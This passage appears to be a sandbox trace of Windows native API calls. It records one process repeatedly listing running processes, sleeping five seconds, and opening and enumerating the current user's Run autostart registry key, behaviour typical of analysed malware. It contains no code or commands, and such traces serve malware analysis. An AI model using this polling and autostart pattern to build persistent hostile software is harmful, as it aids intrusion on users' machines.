NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.715] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.726] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.726] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.726] NtClose (Handle=0x154) returned 0x0 [0180.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.730] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.742] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.742] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.742] NtClose (Handle=0x154) returned 0x0 [0180.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.747] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.757] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.758] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.758] NtClose (Handle=0x154) returned 0x0 [0180.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.762] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.773] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.773] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.773] NtClose (Handle=0x154) returned 0x0 [0180.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.777] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.789] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.790] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.790] NtClose (Handle=0x154) returned 0x0 [0180.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.794] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.804] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.804] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.805] NtClose (Handle=0x154) returned 0x0 [0180.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.809] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.820] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.820] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.820] NtClose (Handle=0x154) returned 0x0 [0180.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.824] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.838] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.838] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.838] NtClose (Handle=0x154) returned 0x0 [0180.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.842] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.851] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.851] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.851] NtClose (Handle=0x154) returned 0x0 [0180.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.855] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.867] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.867] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.867] NtClose (Handle=0x154) returned 0x0 [0180.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.870] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.882] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.883] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.883] NtClose (Handle=0x154) returned 0x0 [0180.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.886] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.899] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.899] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.899] NtClose (Handle=0x154) returned 0x0 [0180.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.903] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.914] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.914] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.914] NtClose (Handle=0x154) returned 0x0 [0180.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, 